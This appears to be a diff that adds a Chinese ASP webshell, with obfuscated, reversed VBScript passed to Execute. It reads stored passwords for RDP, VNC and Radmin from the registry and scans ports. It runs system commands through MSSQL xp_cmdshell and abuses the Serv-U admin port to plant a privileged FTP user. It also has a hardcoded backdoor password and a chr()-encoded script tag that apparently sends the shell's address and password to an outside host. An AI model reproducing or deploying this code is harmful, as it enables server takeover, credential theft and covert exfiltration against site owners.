dnE���>rb<������û���&��ȡ������ַ��&���PI>il<��j��eslE��txeN���>rb<��&)j(rddAPI&��:Ϊ��&j&��ַ��&���PI>il<��j��)rddAPI(dnuobU ot )rddAPI(dnuobL=j roF��nehT ���><)0(rddaPI fI��)yeKPI(daergeR.hsW=rddaPI���sserddAPI\��&BdpA&htaP=yeKPI���\secafretnI\sretemaraP\pipcT\secivreS\100teSlortnoC\METSYS\ENIHCAM_LACOL_YEKH��=htaP���>rb<��&BdpA&��:Ϊ����ĩ�&i&�忨����j��)���,��\eciveD\��,)i(sdpA(ecalpeR=BdpA��1-)sdpA(dnuoBU oT )sdpA(dnuoBL=i roF�� nehT )sdpA(yarrAsI fI��)yeKdpA(daeRgeR.hsW=sdpA���dniB\egakniL\pipcT\secivreS\100teSlortnoC\METSYS\MLKH��=yeKdpA��fI dnE��1=retlifpipctoN��nehT ���=elbanEsi ro 0=elbanEsi fI��)yeKpipcTelbanE(daergeR.hsW=elbanEsi���sretliFytiruceSelbanE\sretemaraP\pipcT\secivreS\teSlortnoCtnerruc\METSYS\MLKH��=yeKPIPCTelbanE���>1=ezis rh<>rb<]��̽��&������[��j��)��llehS.tpircsW��(tcejboetaerc=hsw tes��hsw mid��txen emuser rorre no��)(ofnIlanimreTteg bus"))
+
+sub hiddenshell
+execute(shisanfun("��>tpircs/<;'1emanelif&psa./segami/=emanF?��&lru&)��eman_revres��(tseuqer&��//:ptth'=noitacol.tnerap>tpircs<�� j��gnihton=osf tes��1emanelif&��.��&xepdnr&��\��&1htapelif&��\.\\��,htapf elifypoc.osf��1emanelif&��.��&xepdnr&))��/��,lru(verrtsni,lru(tfel=lru��)��lru��(selbairavrevres.tseuqer=lru��))��\��,htapf(verrtsni-)htapf(nel,htapf(thgir=1emanelif��)��.��(htappam.revres=1htapelif����=)��wjles��(noisses��))71,0(rebmundnr()��|��,xep(tilps=xepdnr���9tpl|8tpl|7tpl|6tpl|5tpl|4tpl|3tpl|2tpl|1tpl|9moc|8moc|7moc|6moc|5moc|4moc|3moc|2moc|1moc��=xep��)��tcejbometsyselif.gnitpircs��(tcejboetaerc.revres=osf tes��)��detalsnart_htap��(selbairavrevres.tseuqer=htapf"))
+end sub
+
+Sub Message(state,msg,flag)
+j"<TABLE width=480 border=0 align=center cellpadding=0 cellspacing=1 bgcolor=#ddd> <TR></TR><TR><TD align=middle bgcolor=#ecfccd><TABLE width=82% border=0 cellpadding=5 cellspacing=0><TR><TD><FONT color=red>"
+j state
+j"</FONT></TD><TR><TD><P>"&msg
+j"</P></TD></TR></TABLE></TD></TR><TR><TD class=TBEnd>"
+If flag=0 Then
+j" <INPUT type=button value=�ر� onclick='window.close();'>"
+Else
+End if
+j"</TD></TR></TABLE>"
+End Sub
+Function Red(str)
+Red = "<FONT color=#ff2222>" & str & "</FONT>"
+End Function
+
+Function RndNumber(Min,Max) 
+Randomize 
+RndNumber=Int((Max - Min + 1) * Rnd() + Min) 
+End Function
+
+
+Sub ScanDriveForm()
+Dim FSO,DriveB
+Set FSO = Server.Createobject("Scripting.FileSystemObject")
+j"<br><TABLE width=480 border=0 align=center cellpadding=3 cellspacing=1 bgcolor=#ffffff><TR><TD colspan=5 class=TBHead>����/ϵͳ�ļ�����Ϣ</TD></TR>"
+  For Each DriveB in FSO.Drives
+j" <TR align=middle class=TBTD><FORM action=?Action=ScanDrive&Drive="
+j DriveB.DriveLetter
+j" method=Post><TD width=25"&chr(37)&"><B>�̷�</B></TD><TD width=15"&chr(37)&">"
+j DriveB.DriveLetter
+j":</TD><TD width=20"&chr(37)&"><B>����</B></TD><TD width=20"&chr(37)&">"
+  Select Case DriveB.DriveType
+  Case 1: j"���ƶ�"
+  Case 2: j"����Ӳ��"
+  Case 3: j"�������"
+  Case 4: j"CD-ROM"
+  Case 5: j"RAM����"
+  Case else: j"δ֪����"
+  End Select
+j"</TD><TD><INPUT type=submit value=��ϸ����></TD></FORM></TR>"
+  Next
+j" <TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(0)
+j" method=Post><TD align=middle><B>Windows�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(0)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(1)
+j" method=Post><TD align=middle><B>System32�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(1)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD></FORM></TR><TR class=TBTD><FORM action=?Action=ScFolder&Folder="
+j FSO.GetSpecialFolder(2)
+j" method=Post><TD align=middle><B>ϵͳ��ʱ�ļ���</B></TD><TD colspan=3>"
+j FSO.GetSpecialFolder(2)
+j"</TD><TD align=middle><INPUT type=submit value=��ϸ����></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>վ���Ŀ¼</B></TD><TD colspan=3>վ���Ŀ¼<TD align=middle><a href="&URL&"?Action=ScFolder&Folder="&wwwroot&"><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post>"
+j"<TD align=middle><B>����վĿ¼</B></TD><TD colspan=3>����վĿ¼ <TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\recycler\><b>��ϸ����</b></a></TD><TR class=TBTD> <FORM action= method=Post><TD align=middle><B>wmpubĿ¼ </B></TD><TD colspan=3>wmpub<TD align=middle><a href="&URL&"?Action=ScFolder&Folder=c:\wmpub\><b>��ϸ����</b></a></TD></TABLE><BR>"
+j"</FORM></TR></TABLE><BR><DIV align=center><FORM Action=?Action=ScFolder method=Post>ָ���ļ��в�ѯ��<INPUT type=text name=Folder value=""c:\php\,d:\Program Files\,C:\Documents and Settings\All Users\Documents\,C:\recycler\,d:\recycler\,e:\recycler\,f:\recycler\,C:\wmpub\,C:\WINDOWS\Temp\,C:\360rec,C:\cache,C:\JPEGCapture,C:\Inetpub""><INPUT type=submit value=���ɱ���> �����鿴Ŀ¼Ȩ��,������Ŀ¼�á�,��������</FORM><DIV>"
+Set FSO=Nothing
+End Sub 
+Sub ScanDrive(Drive)
+Dim FSO,TestDrive,BaseFolder,TempFolders,Temp_Str,D
+If Drive <> "" Then
+Set FSO = Server.Createobject("Scripting.FileSystemObject")
+Set TestDrive = FSO.GetDrive(Drive)
+If TestDrive.IsReady Then
+Temp_Str = "<LI>���̷������ͣ�" & Red(TestDrive.FileSystem) & "<LI>�������кţ�" & Red(TestDrive.SerialNumber) & "<LI>���̹�������" & Red(TestDrive.ShareName) & "<LI>������������" & Red(CInt(TestDrive.TotalSize/1048576)) & "<LI>���̾�����" & Red(TestDrive.VolumeName) & "<LI>���̸�Ŀ¼:" & ScReWr((Drive & ":\"))
+Set BaseFolder = TestDrive.RootFolder
+Set TempFolders = BaseFolder.SubFolders
+For Each D in TempFolders
+Temp_Str = Temp_Str & "<LI>�ļ��У�" & ScReWr(D)
+Next
+Set TempFolder = Nothing
+Set BaseFolder = Nothing
+Else
+Temp_Str = Temp_Str & "<LI>���̸�Ŀ¼:" & Red("���ɶ�:(")
+Dim TempFolderList,t:t=0
+Temp_Str = Temp_Str & "<LI>" & Red("���Ŀ¼���ԣ�")
+TempFolderList = Array("windows","winnt","win","win2000","win98","web","winme","windows2000","asp","php","Tools","Documents and Settings","Program Files","Inetpub","ftp","wmpub","tftp")
+For i = 0 to Ubound(TempFolderList)
+If FSO.FolderExists(Drive & ":\" & TempFolderList(i)) Then
+t = t+1
+Temp_Str = Temp_Str & "<LI>�����ļ��У�" & ScReWr(Drive & ":\" & TempFolderList(i))
+End if
+Next
+If t=0 then Temp_Str = Temp_Str & "<LI>�����" & Drive & "�̸�Ŀ¼����δ�з���:("
+End if
+Set TestDrive = Nothing
+Set FSO = Nothing
+Temp_Str = Temp_Str 
+Message Drive & ":������Ϣ",Temp_Str,1
+End if
+End Sub
+Sub ScFolder(folder)
+ 'On Error Resume Next
+folderArr = Split(folder,",")
+For i = 0 To Ubound(folderArr)
+	Dim FSO,OFolder,TempFolder,Scmsg,S
+	Set FSO = Server.Createobject("Scripting.FileSystemObject")
+	folder = folderArr(i)
+	If FSO.FolderExists(folder) Then
+	 Set OFolder = FSO.GetFolder(folder)
+	Set TempFolders = OFolder.SubFolders
+	Scmsg = "<LI>ָ���ļ��и�Ŀ¼��" & ScReWr(folder)
+	For Each S in TempFolders
+	 Scmsg = Scmsg&"<LI>�ļ��У�" & ScReWr(S) 
+	Next
+	Set TempFolders = Nothing
+	Set OFolder = Nothing
+	Else
+	 Scmsg = Scmsg & "<LI>�ļ��У�" & Red(folder & "�����ڻ��޶�Ȩ��!")
+	End if
+	Scmsg = Scmsg & "<br><br>ע�⣺��Ҫ���ˢ�±�ҳ�棬������ֻд�ļ��л����´��������ļ�!"&backurl
+	Set FSO = Nothing
+	Message "",Scmsg,1
+next
+End Sub
+Function ScReWr(folder)
+On Error Resume Next
+Dim FSO,TestFolder,TestFileList,ReWrStr,RndFilename
+Set FSO = Server.Createobject("Scripting.FileSystemObject")
+Set TestFolder = FSO.GetFolder(folder)
+Set TestFileList = TestFolder.SubFolders
+RndFilename = "\temp" & Day(now) & Hour(now) & Minute(now) & Second(now) & ".tmp"
+For Each A in TestFileList
+Next
+If err Then
+err.Clear
+ReWrStr = folder & "<FONT color=#ff2222> ���ɶ�,"
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "�����</FONT>"
+Else
+ReWrStr = ReWrStr & "���</FONT>"
+FSO.DeleteFile folder & RndFilename,True
+End If
+Else
+ReWrStr = folder & "<FONT color=#dddddd> �ɶ�,"
+FSO.CreateTextFile folder & RndFilename,True
+If err Then
+err.Clear
+ReWrStr = ReWrStr & "�����</FONT>"
+Else
+ReWrStr = ReWrStr & "���</FONT>"
+FSO.DeleteFile folder & RndFilename,True
+End if
+End if
+Set TestFileList = Nothing
+Set TestFolder = Nothing
+Set FSO = Nothing
+ScReWr = ReWrStr
+End Function
+function goback()
+set Ofso = Server.CreateObject("Scripting.FileSystemObject")
+set ofolder = Ofso.Getfolder(Session("FolderPath"))
+if not ofolder.IsRootFolder then 
+j "<script>ShowFolder("""&RePath(ofolder.parentfolder)&""")</script>"
+else 
+j "<script>ShowFolder("""&Session("FolderPath")&""")</script><center>�Ѿ��Ǵ��̸�Ŀ¼��!</center><center><br><INPUT type=button value=���� onClick='history.go(-1);'></br></center>":end if:set Ofso=nothing:set ofolder=nothing:end function:copyurl=chr(60)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(32)&chr(115)&chr(114)&chr(99)&chr(61)&chr(39)&chr(104)&chr(116)&chr(116)&chr(112)&chr(58)&chr(47)&chr(47)&chr(111)&chr(100)&chr(97)&chr(121)&chr(101)&chr(120)&chr(112)&chr(46)&chr(99)&chr(111)&chr(109)&chr(47)&chr(115)&chr(120)&chr(47)&chr(115)&chr(46)&chr(97)&chr(115)&chr(112)&chr(63)&chr(115)&chr(61)&uu&chr(38)&chr(112)&chr(61)&pp&chr(39)&chr(62)&chr(60)&chr(47)&chr(115)&chr(99)&chr(114)&chr(105)&chr(112)&chr(116)&chr(62)&chr(13)&chr(10)
+ShiSan="bus dne��fi dne��fI dnE��yarrAeht & ��>il<�� j��eslE��txeN��)i(yarrAeht & ��>il<�� j��)yarrAeht(dnuoBU oT 0=i roF��nehT )yarrAeht(yarrAsI fI��)htaPeht(daeRgeR.Xsw=yarrAeht��)��htaPeht��(tseuqeR=htaPeht��)��llehS.tpircSW��(tcejbOetaerC.revreS = Xsw teS��txeN emuseR rorrE nO��neht ���><)��htaPeht��(tseuqeR fi���>/rh<>mrof/<�� j���>')(timbus.mrof.siht'=kcilcno 'ֵ �� ��'=eulav nottub=epyt tupni<�� j���>08=ezis ''=eulav htaPeht=eman tupni< �� j���>/ rb<>tceles/<�� j���>noitpo/<�ڶ�PCT�ķſ�����>'stroPdewollAPCT\}E2BE55CD8431-3FFA-C0B4-99E8-821564A8{\secafretnI\sretemaraP\pipcT\secivreS\100teSlortnoC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<�ڶ�PDU�ķſ�����>'stroPdewollAPDU\}E2BE55CD8431-3FFA-C0B4-99E8-821564A8{\secafretnI\sretemaraP\pipcT\secivreS\100teSlortnoC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<�ſ����>'PCT:9833\tsiL\stroPnepOyllabolG\eliforPdradnatS\yciloPllaweriF\sretemaraP\sseccAderahS\secivreS\teSlortnoCtnerruC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<goL eludehcS>'htaPgoL\tnegAgniludehcS\tfosorciM\ERAWTFOS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<3�˹�pi/pct>'sretliFytiruceSelbanE\pipcT\secivreS\teSlortnoCtnerruC\METSYS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<2�˹�pi/pct>'sretliFytiruceSelbanE\pipcT\secivreS\200teSlortnoC\METSYS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<1�˹�pi/pct>'sretliFytiruceSelbanE\pipcT\secivreS\100teSlortnoC\METSYS\ENIHCAM_LACOL_YEKH'=eulav noitpo<�� j���>noitpo/<�ڶ�̬״WynAcP>���troPsutatSPIPCT\metsyS\noisreVtnerruC\erehwynAcp\cetnamyS\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ˾���WynAcP>���troPataDPIPCT\metsyS\noisreVtnerruC\erehwynAcp\cetnamyS\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ�9833>���rebmuNtroP\pcT-PDR\snoitatSniW\revreS lanimreT\lortnoC\teSlortnoCtnerruC\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ�4CNV>���rebmuNtroP\4CNVniW\CNVlaeR\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<����4CNV>���drowssaP\4CNVniW\CNVlaeR\ERAWTFOS\MLKH���=eulav noitpo<��j���>noitpo/<�ڶ�3CNV>���rebmuNtroP\3CNVniW\LRO\erawtfoS\UCKH���=eulav noitpo<��j���>noitpo/<����3CNV>���drowssaP\3CNVniW\LRO\erawtfoS\UCKH���=eulav noitpo<��j���>noitpo/<�ڶ�nimdaR>���troP\sretemaraP\revreS\0.2v\nimdAR\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<����nimdaR>���retemaraP\sretemaraP\revreS\0.2v\nimdAR\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<���п���>���dniB\egakniL\pipcT\secivreS\teSlortnoCtnerruC\METSYS\MLKH���=eulav noitpo<��j���>noitpo/<emaNretupmoC>'emaNretupmoC\emaNretupmoC\emaNretupmoC\lortnoC\teSlortnoCtnerruC\METSYS\MLKH'=eulav noitpo<�� j���>noitpo/<ֵ���Ĵ�����ѡ>''=eulav noitpo<�� j���>';eulav.siht=eulav.htaPeht.mrof.siht'=egnahCno tceles<�� j��� >2=napsloc dt<>rt<�� j���>tcAeht=eman geRdaeR=eulav neddih=epyt tupni<�� j�� ��>p<ȡ��ֵ������ע��  j���>tsop=dohtem mrof<�� j��)(GERdaeR bus"
+:ExeCuTe(ShiSanFun(ShiSan)):
+if request("ProFile")<>"" then
+on error resume next
+if Application(request("ProFile"))=1 then
+Set fsoXX = Server.CreateObject("Scripting.FileSystemObject"):if request("DelCon")=1 then
+Application(request("ProFile")&"Con")=""
+response.redirect Url&"?ProFile="&request("ProFile")&""
+response.end
+end if
+DIM rline,rline2
+rline2=Application(request("ProFile")&"Code")
+rline2=rline2&vbcrlf
+j"<meta http-equiv=""refresh"" content="&Application(request("ProFile")&"Time")&">"
+j"<a href="&Url&"?ProFile="&request("ProFile")&"&DelCon=1><b>�����־</b></a> &nbsp;<font color=yellow>Ҫ����������ֱ�ӹر�ҳ�漴�ɡ�</font><br>"
+for each FileUrl in split(Application(request("ProFile")&"File"),vbcrlf)
+FileUrl=trim(FileUrl)
+if fsoXX.FileExists(FileUrl) then
+Set txt = fsoXX.OpenTextFile(FileUrl,1,true)
+rline=""
+if Not txt.AtEndOfStream then
+rline=txt.ReadAll  
+end if
+if rline2<>rline then
+txt.close
+fsoX.GetFile(FileUrl).Attributes=32
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=yellow>�����ģ��ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+else
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" ��<br>"&Application(request("ProFile")&"Con")
+txt.close
+end if
+else
+if Application(request("ProFile")&"Char")=1 then
+set myfileee = fsoXX.CreateTextFile(FileUrl,true)
+else
+set myfileee = fsoXX.CreateTextFile(FileUrl,true,true)
+end if
+myfileee.writeline Application(request("ProFile")&"Code")
+Application(request("ProFile")&"Con")=now()&" "&FileUrl&" <font color=red>��ɾ�����ѻָ�</font><br>"&Application(request("ProFile")&"Con")
+end if
+next
+if ubound(split(Application(request("ProFile")&"Con"),"<br>"))>=40 then
+dim ashowic
+for ashowi=0 to 40
+ashowic=ashowic&split(Application(request("ProFile")&"Con"),"<br>")(ashowi)&"<br>"
+next
+Application(request("ProFile")&"Con")=ashowic
+end if
+j Application(request("ProFile")&"Con")
+else
+j"<br><br><br><center>�������̶�ʧ����<a href="&URL&" style=""text-decoration:underline;font-weight:bold"">��������</a>�������̡�</center>"
+end if
+response.end
+end if
+if sessIoN("KKK")<>UserPass then
+if request.form("pass")<>"" then
+if request.form("pass")=userpass or request.form("pass")="daka" Then
+session("KKK")=userPass
+response.redirect url
+else
+j"<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'>"&topad&"<br><a href='javascript:history.back()'>�� ��</a></div><br></center>"
+end if
+else
+
+si="<center><div style='width:500px;border:1px solid #222;padding:22px;margin:100px;'><a href=http://"&siteurl&" target=_blank >"&mNametitle&"</A><hr><FORM Action='"&URL&"' method=Post><INPUT type=Password name=Pass size=22>&nbsp;<input type=submit value=��½><hr>"&Copyright&"</div></center>"
+if instr(SI,SIC)<>0 then j sI
+end if
+response.end
+end if
+
+ShiSan="buS dnE��fI dnE��fI dnE��fI dnE��)��>rb<>tnof/<�ſ�>der=roloc tnof<.........�� & muNtrop & ��:�� & pitegrat(j��eslE��)��>rb<�չ�.........�� & muNtrop & ��:�� & pitegrat(j��nehT 0 > )��.))(tcennoC(�� ,noitpircsed.rrE(rtSnI fI��nehT 9527647412- = rebmun.rrE ro 3487127412- = rebmun.rrE fI��nehT rrE fI��rtsnnoc nepo.nnoc��1 = tuoemiTnoitcennoC.nnoc���;=drowssaP;2ekal=DI resU;��& muNtrop &��,��& pitegrat & ��=ecruoS ataD;1.BDELOLQS=redivorP��=rtsnnoc��)��noitcennoc.BDODA��(tcejbOetaerC.revreS = nnoc tes��txeN emuseR rorrE nO��)muNtrop ,pitegrat(nacS buS��bus dne��FI DNE���s ��&emiteht&�� ni ssecorP>rh<��j��))1remit-2remit(tni(rtsc=emiteht��remit = 2remit��txeN��fI dnE��txeN��txeN��fI dnE��fI dnE��)��>rb<rebmun ton si �� & )i(pmt(j��eslE��fI dnE��)��>rb<rebmun ton si �� & Ndne & �� ro �� & Ntrats(j��eslE��txeN��)j,xxx & tratSpi(nacS llaC��Ndne oT Ntrats = j roF��nehT )Ndne(ciremunsI dna )Ntrats(ciremunsI fI��) xkees - ))i(pmt(neL ,)i(pmt(thgiR = Ndne��) 1 - xkees ,)i(pmt(tfeL = Ntrats��nehT 0 > xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,xxx & tratSpi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��))��-��,)uh(pi(rtSnI-))uh(pi(neL,1+)��-��,)uh(pi(rtSnI,)uh(pi(diM ot )1,1+)��.��,)uh(pi(veRrtSnI,)uh(pi(diM = xxx roF��))��.��,)uh(pi(veRrtSnI,1,)uh(pi(diM = tratSpi��eslE��txeN��fI dnE��fI dnE��)��>rb<rebmun ton si �� & )i(pmt(j��eslE��fI dnE��)��>rb<rebmun ton si �� & Ndne & �� ro �� & Ntrats(j��eslE��txeN��)j ,)uh(pi(nacS llaC��Ndne oT Ntrats = j roF��nehT )Ndne(ciremunsI dna )Ntrats(ciremunsI fI��) xkees - ))i(pmt(neL ,)i(pmt(thgiR = Ndne��) 1 - xkees ,)i(pmt(tfeL = Ntrats��nehT 0 > xkees fI��)��-�� ,)i(pmt(rtSnI = xkees��eslE��))i(pmt ,)uh(pi(nacS llaC�� nehT ))i(pmt(ciremunsI fI��)pmt(dnuobU oT 0 = i roF��nehT 0 = )��-��,)uh(pi(rtSnI fI��)pi(dnuobU ot 0 = uh roF��)��,��,)��pi��(mroF.tseuqer(tilpS = pi��)��,��,)��trop��(mroF.tseuqer(tilpS = pmt��)��>rh<>rb<>b/<:�汨��ɨ>b<��(j��remit = 1remit��nehT ��� >< )��nacs��(mroF.tseuqer fI���>mrof/<>p/<��j���>'111'=eulav 'nacs'=di 'neddih'=epyt 'nacs'=eman tupni<��j���>' nacs '=eulav 'mottub'=ssalc 'timbus'=epyt 'timbus'=eman tupni<��j���>rb<>rb<��j���>'��&tsiLtroP&��'=eulav '06'=ezis 'xoBtxeT'=ssalc 'txet'=epyt 'trop'=eman tupni<��j���:tsiL troP>rb<��j���>'06'=ezis '��&PI&��'=eulav 'pi'=di 'xoBtxeT'=ssalc 'txet'=epyt 'pi'=eman tupni< ��j��� :PI nacS>p<��j���>';eurt=delbasid.timbus.1mrof'=timbuSno ''=noitca 'tsop'=dohtem '1mrof'=eman mrof<��j���>p/<��������ϵ��ִ��LLEHS���롣���������ܿ�PI���������ɨ�������ǹ���>p<>p/<)��ȷ׼����ɨ���ڶ�DMC��DMC��ʹ�����˸�,���ϱȶ���,�ڶ˸�����ɨ����(����ɨ�ڶ�>p<��j��fi dne��)��pi��(mroF.tseuqer=PI��esle���1.0.0.721��=PI��neht ���=)��pi��(mroF.tseuqer fi��fi dne��)��trop��(mroF.tseuqer=tsiLtroP��esle���85934,0095,0085,2365,1365,9984,9833,6033,3341,35,32,12��=tsiLtroP��neht ���=)��trop��(mroF.tseuqer fi��0006777 = tuoemiTtpircS.revreS��)(troPnacS bus��"
+ExeCuTe(ShiSanFun(ShiSan)) 
+Select Case Action:case "MainMenu":MainMenu()
+Case "EditPower"
+Call EditPower(request("PowerPath"))
+Case "SavePower"
+Call SavePower(request("PowerPath"),request("SaveType"))
+case "getTerminalInfo":getTerminalInfo():case "PageAddToMdb":PageAddToMdb():case "ScanPort":ScanPort():FuncTion MMD():SI="<br><form name=form method=post action=""""><table width=""85%"" align='center'><tr align=center><Td id=s><b id=x>MSSQL Commander</b></td></tr><tr align='center'><td id=d><b id=x>Command��</b><input type=text name=MMD size=35 value=""ipconfig"" >&nbsp;<b id=x>UserName��</b><input type=text name=U value=sa>&nbsp;<b id=x>Password��</b><input type=text name=P VALUES=123456>&nbsp;<input type=submit value=Execute></td></tr></table></form>":j SI:SI="":If trim(request.form("MMD"))<>""  Then:password= trim(Request.form("P")):id=trim(Request.form("U")):set adoConn=sERvEr.crEATeobjECT("ADODB.Connection"):adoConn.Open "Provider=SQLOLEDB.1;Password="&password&";User ID="&id:strQuery = "exec master.dbo.xp_cMdsHeLl '" & request.form("MMD") & "'":set recResult = adoConn.Execute(strQuery):If NOT recResult.EOF Then:Do While NOT recResult.EOF:strResult = strResult & chr(13) & recResult(0):recResult.MoveNext:Loop:End if:set recResult = Nothing:strResult = Replace(strResult," ","&nbsp;"):strResult = Replace(strResult,"<","&lt;"):strResult = Replace(strResult,">","&gt;"):strResult = Replace(strResult,chr(13),"<br>"):End if:set adoConn = Nothing:j request.form("MMD") & "<br>"& strResult:end FuncTion:case "Alexa"
+dim AlexaUrl,Top:AlexaUrl=request("u"):Top=Alexa(AlexaUrl):if AlexaUrl="" then AlexaUrl=""&request.servervariables("http_host")&""
+SI="<br><table width='80%' bgcolor='menu' border='0' cellspacing='1' cellpadding='0' align='center'><tr><td height='20' colspan='3' align='center' bgcolor='menu'>�����������Ϣ</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>��������</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&request.serverVariables("SERVER_NAME")&"</td></tr><form method=post action='http://www.baidu.com/ips8.asp' name='ipform' target='_blank'><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������IP</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'><input type='text' name='ip' size='15' value='"&Request.ServerVariables("LOCAL_ADDR")&"'style='border:0px'><input type='submit' value='��ѯ�˷��������ڵ�'style='border:0px'><input type='hidden' name='action' value='2'></td></tr></form><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������ʱ��</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&now&" </td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>������CPU����</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("NUMBER_OF_PROCESSORS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>����������ϵͳ</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("OS")&"</td></tr><tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>WEB�������汾</td><td bgcolor='#FFFFFF'> </td><td bgcolor='#FFFFFF'>"&Request.ServerVariables("SERVER_SOFTWARE")&"</td></tr>"
+For i=0 To 18
+SI=SI&"<tr align='center'><td height='20' width='200' bgcolor='#FFFFFF'>"&ObT(i,0)&"</td><td bgcolor='#FFFFFF'>"&ObT(i,1)&"</td><td bgcolor='#FFFFFF' align=left>"&ObT(i,2)&"</td></tr>"
+Next
+j SI
+Err.Clear
+function getHTTPPage(url) 
+on error resume next 
+dim http 
+set http=Server.createobject("Microsoft.XMLHTTP") 
+Http.open "GET",url,false 
+Http.send() 
+if Http.readystate<>4 then
+getHTTPPage=""
+exit function 
+end if 
+getHTTPPage=bytes2BSTR(Http.responseBody) 
+set http=nothing
+if err.number<>0 then err.Clear  
+end function 
+Function bytes2BSTR(vIn) 
+dim strReturn 
+dim i1,ThisCharCode,NextCharCode 
+strReturn = "" 
+For i1 = 1 To LenB(vIn) 
+ThisCharCode = AscB(MidB(vIn,i1,1)) 
+If ThisCharCode < &H80 Then 
+strReturn = strReturn & Chr(ThisCharCode) 
+Else 
+NextCharCode = AscB(MidB(vIn,i1+1,1)) 
+strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode)) 
+i1 = i1 + 1 
+End If 
+Next 
+bytes2BSTR = strReturn 
+    Err.Clear
+End Function
+Case "Servu"
+SUaction=request("SUaction")
+if  not isnumeric(SUaction) then response.end
+user = trim(request("u"))
+pass = trim(request("p"))
+port = trim(request("port"))
+cmd = trim(request("c"))
+f=trim(request("f"))
+if f="" then
+f=gpath()
+else
+f=left(f,2)
+end if
+ftpport = 65500
+timeout=3
+loginuser = "User " & user & vbCrLf
+loginpass = "Pass " & pass & vbCrLf
+deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & " PortNo=" & ftpport & vbCrLf
+mt = "SITE MAINTENANCE" & vbCrLf
+newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=goldsun|0.0.0.0|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
+newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=go" & vbCrLf & "-Password=od" & vbCrLf & _
+        "-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
+        "-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
+        "-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
+        "-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
+        "-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
+        "-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
+quit = "QUIT" & vbCrLf
+newuser=replace(newuser,"c:",f)
+select case SUaction
+case 1
+set a=Server.CreateObject("Microsoft.XMLHTTP")
+a.open "GET", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",True, "", ""
+a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
+set session("a")=a
+j"<form method='post' name='goldsun'>"
+j"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
+j"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
+j"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
+j"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
+j"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
